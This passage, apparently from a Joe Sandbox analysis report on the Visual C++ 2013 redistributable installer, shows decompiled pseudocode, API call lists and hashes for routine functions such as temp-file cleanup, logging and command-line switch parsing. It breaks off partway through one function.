GetTempPathW.KERNEL32(00000104,?,?,?,?,00000000,?,00000000), ref: 012B67F1
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B67FB
FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,?,?,00000000,?,00000000), ref: 012B684D
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B685E
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000000,?,00000000), ref: 012B6940
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000), ref: 012B6954
GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000000,?,00000000), ref: 012B697E
MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000000,?,00000000), ref: 012B69A1
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000000,?,00000000), ref: 012B69BA
FindNextFileW.KERNEL32(000000FF,?,?,?,?,?,?,?,00000000,?,00000000), ref: 012B69C9
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B69DD
RemoveDirectoryW.KERNEL32(?,?,?,?,00000000,?,00000000), ref: 012B69F0
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B69FE
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000000,?,00000000), ref: 012B6A29
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B6A52
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B6A73
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B6A94
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B6AB5
FindClose.KERNEL32(000000FF,?,?,?,00000000,?,00000000), ref: 012B6AE9

Strings

*.*, xrefs: 012B6826
DEL, xrefs: 012B6972
dirutil.cpp, xrefs: 012B676C, 012B6A43

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLast$AttributesFindMove$Temp_memset$CloseDeleteDirectoryFirstNameNextPathRemove
String ID: *.*$DEL$dirutil.cpp
API String ID: 4152325254-1252831301
Opcode ID: a48ee43217eff6fe285c55854c11ca6916d374a9fe689854e0fe396ccbb5ef0e
Instruction ID: 3cb23671e3dd83a4609e9473532280928f5a5e88adaa09cb29ac672242d6e504
Opcode Fuzzy Hash: a48ee43217eff6fe285c55854c11ca6916d374a9fe689854e0fe396ccbb5ef0e
Instruction Fuzzy Hash: 70B1EB725302179AEF315A39DCC9BEA7AB6AF80790F1441A5E719E3140EB72C991CF10

Uniqueness

Uniqueness Score: -1.00%

Function 012B50CA Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 151
libraryloadercomCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E012B50CA(intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				_Unknown_base(*)()* _t63;
				signed int _t67;
				intOrPtr* _t73;
				struct HINSTANCE__* _t82;

				_v28 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v12 = 0;
				_t82 = GetModuleHandleA("kernel32.dll");
				if(_t82 != 0) {
					if(GetProcAddress(_t82, "IsWow64Process") != 0) {
						_t73 = GetProcAddress(_t82, "Wow64DisableWow64FsRedirection");
						_v20 = GetProcAddress(_t82, "Wow64EnableWow64FsRedirection");
						_t63 = GetProcAddress(_t82, "Wow64RevertWow64FsRedirection");
						_v28 = _t63;
						if(_t73 == 0 || _v20 == 0 || _t63 == 0) {
							_v20 = _v20 & 0x00000000;
						} else {
							 *_t73( &_v24);
							_v20 = _v20(1);
						}
					}
					_t46 =  &_v12;
					__imp__CoCreateInstance(0x12d5e58, 0, 1, 0x12bacb0, _t46); // executed
					_v8 = _t46;
					if(_t46 < 0) {
						L30:
						if(_v20 == 0) {
							L6:
							_t47 = _v16;
							if(_t47 != 0) {
								 *((intOrPtr*)( *_t47 + 8))(_t47);
							}
							_t48 = _v12;
							if(_t48 != 0) {
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
							return _v8;
						}
						_push(_v24);
						if(_v28() != 0) {
							goto L6;
						}
						ExitProcess(1);
					} else {
						_push(0x10);
						asm("repe cmpsb");
						if(0 != 0) {
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
						}
						if(0 == 0) {
							L24:
							 *0x12d5e74 = 1;
							goto L25;
						} else {
							_push(0x10);
							asm("repe cmpsb");
							if(0 != 0) {
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
							}
							if(0 != 0) {
								L25:
								if(_a4 == 0) {
									L28:
									_v12 = _v12 & 0x00000000;
									 *_a8 = _v12;
									_t55 = _a12;
									if(_t55 != 0) {
										_v16 = _v16 & 0x00000000;
										 *_t55 = _v16;
									}
									goto L30;
								}
								_t57 = E012B4E4B( &_v16, _v12, _a4,  &_v16);
								_v8 = _t57;
								if(_t57 < 0) {
									goto L30;
								}
								_t58 = _v12;
								_t59 =  *((intOrPtr*)( *_t58 + 0x54))(_t58, _v16, 0);
								_v8 = _t59;
								if(_t59 < 0) {
									goto L30;
								}
								goto L28;
							} else {
								goto L24;
							}
						}
					}
				}
				_t67 = GetLastError();
				if(_t67 > 0) {
					_t67 = _t67 & 0x0000ffff | 0x80070000;
				}
				_v8 = _t67;
				if(_t67 >= 0) {
					_v8 = 0x80004005;
				}
				E012B294E(_t67, "xmlutil.cpp", 0x8d, _v8);
				goto L6;
			}

0x012b50d9
0x012b50dc
0x012b50df
0x012b50e2
0x012b50e5
0x012b50ee
0x012b50f2
0x012b515c
0x012b516c
0x012b5176
0x012b5179
0x012b517b
0x012b5180
0x012b518c
0x012b5192
0x012b5196
0x012b519d
0x012b519d
0x012b5180
0x012b51a0
0x012b51b3
0x012b51b9
0x012b51be
0x012b524d
0x012b5252
0x012b5128
0x012b5128
0x012b512f
0x012b5134
0x012b5134
0x012b5137
0x012b513c
0x012b5141
0x012b5141
0x012b5148
0x012b5148
0x012b5258
0x012b5260
0x00000000
0x00000000
0x012b5268
0x012b51c4
0x012b51c4
0x012b51d0
0x012b51d2
0x012b51d4
0x012b51d6
0x012b51d6
0x012b51db
0x012b51f6
0x012b51f6
0x00000000
0x012b51dd
0x012b51dd
0x012b51e9
0x012b51eb
0x012b51ed
0x012b51ef
0x012b51ef
0x012b51f4
0x012b5200
0x012b5204
0x012b5231
0x012b5237
0x012b523b
0x012b523d
0x012b5242
0x012b5247
0x012b524b
0x012b524b
0x00000000
0x012b5242
0x012b5210
0x012b5215
0x012b521a
0x00000000
0x00000000
0x012b521c
0x012b5227
0x012b522a
0x012b522f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x012b51f4
0x012b51db
0x012b51be
0x012b50f4
0x012b50fc
0x012b5103
0x012b5103
0x012b5108
0x012b510d
0x012b510f
0x012b510f
0x012b5123
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,?,012B52B2,00000000,?,00000000), ref: 012B50E8
GetLastError.KERNEL32(?,?,012B52B2,00000000,?,00000000,?,?,?,?,?,?,?,?,012A386B,01282222), ref: 012B50F4
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 012B5158
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 012B5164
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 012B516E
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 012B5179
CoCreateInstance.OLE32(012D5E58,00000000,00000001,012BACB0,?,?,?,012B52B2,00000000,?,00000000), ref: 012B51B3
ExitProcess.KERNEL32 ref: 012B5268

Strings

Wow64EnableWow64FsRedirection, xrefs: 012B5166
IsWow64Process, xrefs: 012B5152
Wow64RevertWow64FsRedirection, xrefs: 012B5170
Wow64DisableWow64FsRedirection, xrefs: 012B515E
xmlutil.cpp, xrefs: 012B511E
kernel32.dll, xrefs: 012B50D4

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: 6ceb0d0fc9aa164bcad5e29bd6c7ca07cd983d17f119120fbbef06a2e8f43bee
Instruction ID: 5fc8a436ab325d63d35d58b0a773401f2927e475a917b65dd8f5e13d68ea852c
Opcode Fuzzy Hash: 6ceb0d0fc9aa164bcad5e29bd6c7ca07cd983d17f119120fbbef06a2e8f43bee
Instruction Fuzzy Hash: 7C514E31A6021AABEB219FA9CC84BEE7FB8AF04791F144559F610EB180D7B5D6418B90

Uniqueness

Uniqueness Score: -1.00%

Function 012AF195 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136
threadtimeCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E012AF195(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				long _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t40;
				intOrPtr* _t43;
				void* _t44;
				signed int _t50;
				void* _t58;
				char _t59;
				char* _t60;
				char* _t64;
				signed int _t65;
				char* _t68;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t74;

				_t61 = __ecx;
				_t33 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t33 ^ _t71;
				_t59 = 0;
				_t66 = 0;
				_t69 = __ecx;
				_v36 = _a8;
				_v32 = 0;
				_v28 = 0;
				_t74 =  *0x12d5d90 - _t59; // 0x0
				if(_t74 != 0) {
					L27:
					return E012A7EAA(_t66, _t59, _v8 ^ _t71, _t65, _t66, _t69);
				}
				EnterCriticalSection(0x12d5d9c);
				if(_a12 == 0) {
					L16:
					_t38 = _v32;
					if(_v32 == _t59) {
						_t38 = _v36;
					}
					_t40 = E012B076E( &_v28, _t38, _t59, 0xfde9);
					_t66 = _t40;
					if(_t40 >= _t59) {
						_t43 =  *0x12d5dc4; // 0x0
						if(_t43 == _t59) {
							_t44 = E012AF0FA(_t61, _v28);
						} else {
							_t44 =  *_t43(_v28,  *0x12d5dc8); // executed
						}
						_t66 = _t44;
					}
					L23:
					LeaveCriticalSection(0x12d5d9c);
					if(_v32 != _t59) {
						E012B01E8(_v32);
					}
					if(_v28 != _t59) {
						E012B01E8(_v28);
					}
					goto L27;
				}
				_v40 = GetCurrentProcessId();
				_v44 = GetCurrentThreadId();
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetLocalTime( &_v24);
				_t70 = _t69 & 0xf0000000;
				_t50 = _t69 & 0x0fffffff;
				if(_t70 == 0xe0000000 || _a4 == 5) {
					_t60 = "e";
				} else {
					if(_t70 == 0xa0000000 || _a4 == 1) {
						_t60 = "w";
					} else {
						_t60 = "i";
					}
				}
				_t64 =  *0x12d5dbc; // 0x0
				_t68 = _t64;
				if(_t64 == 0) {
					_t68 = L"\r\n";
				}
				_t61 =  *0x12d5dc0; // 0x0
				_t69 = 0x12ba5c8;
				if(_t61 == 0) {
					_t61 = 0x12ba5c8;
				}
				_t65 =  *0x12d5db8; // 0x0
				if(_t65 == 0) {
					_t65 = _t69;
				}
				_push(_t68);
				_push(_v36);
				_push(_t61);
				_push(_t50);
				_push(_t60);
				_push(_v24.wSecond & 0x0000ffff);
				_push(_v24.wMinute & 0x0000ffff);
				_push(_v24.wHour & 0x0000ffff);
				_push(_v24.wDay & 0x0000ffff);
				_push(_v24.wMonth & 0x0000ffff);
				_push(_v24.wYear & 0x0000ffff);
				_push(_v44);
				_push(_v40);
				_t58 = E012B177A( &_v32, L"%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls", _t65);
				_t66 = _t58;
				_t59 = 0;
				if(_t58 < 0) {
					goto L23;
				} else {
					goto L16;
				}
			}

0x012af195
0x012af19b
0x012af1a2
0x012af1aa
0x012af1ad
0x012af1af
0x012af1b1
0x012af1b4
0x012af1b7
0x012af1ba
0x012af1c0
0x012af313
0x012af323
0x012af323
0x012af1cb
0x012af1d4
0x012af2ae
0x012af2ae
0x012af2b3
0x012af2b5
0x012af2b5
0x012af2c3
0x012af2c8
0x012af2cc
0x012af2ce
0x012af2d5
0x012af2e7
0x012af2d7
0x012af2e0
0x012af2e0
0x012af2ec
0x012af2ec
0x012af2ee
0x012af2f3
0x012af2fc
0x012af301
0x012af301
0x012af309
0x012af30e
0x012af30e
0x00000000
0x012af309
0x012af1e0
0x012af1e9
0x012af1f1
0x012af1f2
0x012af1f3
0x012af1f4
0x012af1f9
0x012af201
0x012af207
0x012af212
0x012af236
0x012af21a
0x012af220
0x012af22f
0x012af228
0x012af228
0x012af228
0x012af220
0x012af23b
0x012af241
0x012af245
0x012af247
0x012af247
0x012af24c
0x012af252
0x012af259
0x012af25b
0x012af25b
0x012af25d
0x012af265
0x012af267
0x012af267
0x012af269
0x012af26a
0x012af26d
0x012af26e
0x012af273
0x012af274
0x012af279
0x012af27e
0x012af283
0x012af288
0x012af28d
0x012af28e
0x012af294
0x012af29e
0x012af2a3
0x012af2a8
0x012af2ac
0x00000000
0x00000000
0x00000000
0x00000000

APIs

EnterCriticalSection.KERNEL32(012D5D9C,00000000,00000000,?,00000340,?,?,0128312E,?,Failed to read data for message.,pipe.cpp,00000340,?,?,?,?), ref: 012AF1CB
GetCurrentProcessId.KERNEL32(?,0128312E,?,Failed to read data for message.,pipe.cpp,00000340,?,?,?,?,00000000), ref: 012AF1DA
GetCurrentThreadId.KERNEL32 ref: 012AF1E3
GetLocalTime.KERNEL32(?,?,0128312E,?,Failed to read data for message.,pipe.cpp,00000340,?,?,?,?,00000000), ref: 012AF1F9
LeaveCriticalSection.KERNEL32(012D5D9C,?,0128312E,00000000,0000FDE9,?,0128312E,?,Failed to read data for message.,pipe.cpp,00000340,?,?,?,?,00000000), ref: 012AF2F3

Strings

%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 012AF298

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
API String ID: 296830338-59366893
Opcode ID: 14741dfd137d749abf2e65e393f398a256a8d2ab31115890daa8c6e171aa12fe
Instruction ID: e295815606014ae76a096e2f11a004e25ef67ef219df6a72a3ef83da64d6c565
Opcode Fuzzy Hash: 14741dfd137d749abf2e65e393f398a256a8d2ab31115890daa8c6e171aa12fe
Instruction Fuzzy Hash: 73416475E2020AAFDF209FD9D9889BEBBB5AB48311F544029F701E7154D7788D42CB64

Uniqueness

Uniqueness Score: -1.00%

Function 012AF326 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012AF326(void* __ebx, void* __ecx, intOrPtr _a4, void* _a8, long _a12, char* _a16, intOrPtr _a20) {
				short _v8;
				signed int _t22;
				signed int _t27;
				void* _t31;
				void* _t33;
				short* _t36;
				short _t37;
				signed int _t39;

				_t39 = 0;
				_v8 = _v8 & 0;
				_t22 = FormatMessageW(0x900, _a8, _a12, 0,  &_v8, 0,  &_a16);
				if(_t22 != 0) {
					if(_t22 >= 2) {
						_t37 = _v8;
						_t36 = _t37 + _t22 * 2 - 4;
						_t31 = 0xd;
						if(_t31 ==  *_t36) {
							_t33 = 0xa;
							if(_t33 ==  *((intOrPtr*)(_t37 + _t22 * 2 - 2))) {
								 *_t36 = 0;
							}
						}
					}
					L10:
					E012AF195(_a12, _a4, _v8, _a20); // executed
					L11:
					if(_v8 != 0) {
						LocalFree(_v8);
					}
					return _t39;
				}
				_t27 = GetLastError();
				if(_t27 > 0) {
					_t27 = _t27 & 0x0000ffff | 0x80070000;
				}
				_t39 = _t27;
				if(_t39 >= 0) {
					goto L10;
				}
				E012B294E(_t27, "logutil.cpp", 0x33b, _t39);
				goto L11;
			}

0x012af32f
0x012af331
0x012af345
0x012af34d
0x012af37e
0x012af380
0x012af386
0x012af38a
0x012af38e
0x012af392
0x012af398
0x012af39c
0x012af39c
0x012af398
0x012af39f
0x012af3a0
0x012af3ac
0x012af3b1
0x012af3b5
0x012af3ba
0x012af3ba
0x012af3c4
0x012af3c4
0x012af34f
0x012af357
0x012af35e
0x012af35e
0x012af363
0x012af367
0x00000000
0x00000000
0x012af374
0x00000000

APIs

FormatMessageW.KERNEL32(00000900,00000000,?,00000000,?,00000000,?,00000000,00000000,?,012AF4E7,00000000,?,00000000,?,00000001), ref: 012AF345
GetLastError.KERNEL32(?,012AF4E7,00000000,?,00000000,?,00000001,?,0128157A,00000000,00000000,00000000,?,?,0129971D,00000002), ref: 012AF34F
LocalFree.KERNEL32(00000000,00000000,?,00000000,?,012AF4E7,00000000,?,00000000,?,00000001,?,0128157A,00000000,00000000,00000000), ref: 012AF3BA

Strings

logutil.cpp, xrefs: 012AF36F

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: logutil.cpp
API String ID: 1365068426-3545173039
Opcode ID: ada9836c2ab25a0802f27b319a1dfaddf7e72f0c71b0567384307c42af4a9d31
Instruction ID: 7eae369d373c6b9e02ee699aced7ccb781658a07fb0ca1595163c8ea904a8429
Opcode Fuzzy Hash: ada9836c2ab25a0802f27b319a1dfaddf7e72f0c71b0567384307c42af4a9d31
Instruction Fuzzy Hash: 6311E37622024AEBDB21DFA5DE85EAE3779EF84750F500019FA01D6160D3369A50D760

Uniqueness

Uniqueness Score: -1.00%

Function 0128C7EA Relevance: 211.0, APIs: 57, Strings: 63, Instructions: 1021
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0128C7EA(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, int* _a4, intOrPtr _a8, intOrPtr _a12, int* _a16, signed int* _a20, int* _a24, int* _a28, intOrPtr _a32, int* _a36, int* _a40, signed int* _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60) {
				signed int _v8;
				int _v12;
				void* _v16;
				int _v20;
				short* _v24;
				int* _t173;
				int _t179;
				signed short* _t181;
				int _t183;
				signed int _t186;
				int _t189;
				int* _t197;
				int* _t207;
				intOrPtr* _t244;
				int _t314;
				WCHAR* _t315;
				int _t320;
				WCHAR* _t321;
				int _t328;
				intOrPtr* _t342;
				intOrPtr* _t346;
				int* _t348;
				int _t360;
				int _t369;
				int _t376;
				signed int _t378;
				signed int _t382;
				signed int _t385;
				int* _t387;
				int* _t388;
				intOrPtr* _t390;
				intOrPtr* _t391;
				int* _t392;
				signed int _t394;
				int _t402;
				void* _t405;
				signed int _t406;
				void* _t410;
				int _t411;
				WCHAR* _t414;
				int* _t416;
				signed int _t419;
				void* _t424;
				void* _t427;
				signed int _t437;
				void* _t440;
				int _t441;
				intOrPtr* _t447;
				int _t448;
				signed short** _t450;
				int _t451;
				int _t452;
				void* _t456;

				_t410 = __ebx;
				_push(__esi);
				_t447 = __eax;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				if(__eax == 0 ||  *__eax == 0) {
					L14:
					_push(_t410);
					_v8 = 1;
					_t411 = 2;
					if(_v20 <= 1) {
						L148:
						_t416 = _a16;
						_t441 =  *_t416;
						_t448 = 4;
						if(_t441 == _t448) {
							L179:
							if(_t441 != _t411) {
								L152:
								_t173 = _a4;
								L153:
								if( *_t173 == 0) {
									 *_t173 = 5;
								}
								if( *(_t173 + 4) == 0) {
									 *(_t173 + 4) = _t448;
								}
								if( *((intOrPtr*)(_t173 + 8)) == 0) {
									_a4[2] = _t411;
								}
								L159:
								if(_v16 != 0) {
									LocalFree(_v16);
								}
								goto L161;
							}
							_t173 = _a4;
							 *(_t173 + 4) = 1;
							goto L153;
						}
						_t179 =  *_a36;
						if(_t179 == _t411 || _t179 == 3) {
							 *_t416 = 1;
							goto L152;
						} else {
							goto L179;
						}
					}
					do {
						_t450 = _v16 + _v8 * 4;
						_t181 =  *_t450;
						_t419 =  *_t181 & 0x0000ffff;
						if(_t419 == 0x2d || _t419 == 0x2f) {
							_t183 = CompareStringW(0x7f, 1,  &(_t181[1]), 0xffffffff, "l", 0xffffffff); // executed
							if(_t183 == _t411 || CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"log", 0xffffffff) == _t411) {
								 *_a44 =  *_a44 & 0xfffffffe;
								_t186 = _v8 + 1;
								if(_t186 >= _v20) {
									_t451 = 0x80070057;
									E012B294E(_t186, "core.cpp", 0x3c6, 0x80070057);
									_push("Must specify a path for log.");
									goto L174;
								}
								_v8 = _t186;
								_t189 = E012B1171(_v16, _t440, _a48,  *((intOrPtr*)(_v16 + _t186 * 4)), 0);
								_v12 = _t189;
								if(_t189 >= 0) {
									goto L147;
								}
								_push("Failed to copy log file path.");
								goto L133;
							} else {
								if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, "?", 0xffffffff) == _t411 || CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, "h", 0xffffffff) == _t411 || CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"help", 0xffffffff) == _t411) {
									_t197 = _a4;
									goto L63;
								} else {
									if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, "q", 0xffffffff) == _t411 || CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"quiet", 0xffffffff) == _t411 || CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, "s", 0xffffffff) == _t411 || CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"silent", 0xffffffff) == _t411) {
										_t207 = _a4;
										 *(_t207 + 4) = _t411;
										goto L29;
									} else {
										if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"passive", 0xffffffff) != _t411) {
											if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"norestart", 0xffffffff) != _t411) {
												if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"forcerestart", 0xffffffff) != _t411) {
													if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"promptrestart", 0xffffffff) != _t411) {
														if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"layout", 0xffffffff) != _t411) {
															if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"uninstall", 0xffffffff) != _t411) {
																if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"repair", 0xffffffff) != _t411) {
																	if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"modify", 0xffffffff) != _t411) {
																		if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"package", 0xffffffff) == _t411 || CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"update", 0xffffffff) == _t411) {
																			_t244 = _a4;
																			if( *_t244 == 0) {
																				 *_t244 = 5;
																			}
																		} else {
																			if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"noaupause", 0xffffffff) != _t411) {
																				if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"keepaupaused", 0xffffffff) != _t411) {
																					if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"parallelcacheandexecute", 0xffffffff) != _t411) {
																						if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"serialcacheandexecute", 0xffffffff) != _t411) {
																							if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"cache", 0xffffffff) != _t411) {
																								if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"disablesystemrestore", 0xffffffff) != _t411) {
																									if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"originalsource", 0xffffffff) != _t411) {
																										if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"parent", 0xffffffff) != _t411) {
																											if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"parent:none", 0xffffffff) != _t411) {
																												if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.log.append", 0xffffffff) != _t411) {
																													if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.elevated", 0xffffffff) != _t411) {
																														if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.unelevated", 0xffffffff) != _t411) {
																															if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.embedded", 0xffffffff) != _t411) {
																																if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.embedded.async", 0xffffffff) != _t411) {
																																	if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.related.detect", 0xffffffff) != _t411) {
																																		if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.related.upgrade", 0xffffffff) != _t411) {
																																			if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.related.addon", 0xffffffff) != _t411) {
																																				if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.related.patch", 0xffffffff) != _t411) {
																																					if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.related.update", 0xffffffff) != _t411) {
																																						if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.passthrough", 0xffffffff) != _t411) {
																																							if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.disable.unelevate", 0xffffffff) != _t411) {
																																								if(CompareStringW(0x7f, 1,  *_t450 + _t411, 0xffffffff, L"burn.runonce", 0xffffffff) != _t411) {
																																									_t314 = lstrlenW(L"burn.ignoredependencies");
																																									_t315 = L"burn.ignoredependencies";
																																									if(CompareStringW(0x7f, 1,  *_t450 + _t411, lstrlenW(_t315), _t315, _t314) != _t411) {
																																										_t320 = lstrlenW(L"burn.ancestors");
																																										_t321 = L"burn.ancestors";
																																										if(CompareStringW(0x7f, 1,  *_t450 + _t411, lstrlenW(_t321), _t321, _t320) != _t411) {
																																											_t328 = lstrlenW( *_t450 + _t411);
																																											if(_t328 < lstrlenW(L"burn.")) {
																																												_t411 = 2;
																																												goto L146;
																																											}
																																											_t414 = L"burn.";
																																											_push(lstrlenW(_t414));
																																											_push(_t414);
																																											_push(lstrlenW(_t414));
																																											_t411 = 2;
																																											if(CompareStringW(0x7f, 1,  *_t450 + _t411, ??, ??, ??) != _t411) {
																																												goto L146;
																																											}
																																											_push( *_t450 + _t411);
																																											_push(0xa0000002);
																																											L107:
																																											_push(_t411);
																																											E01281566();
																																											_t456 = _t456 + 0xc;
																																											goto L147;
																																										}
																																										_t342 =  *_t450 + 2 + lstrlenW(L"burn.ancestors") * 2;
																																										_t424 = 0x3d;
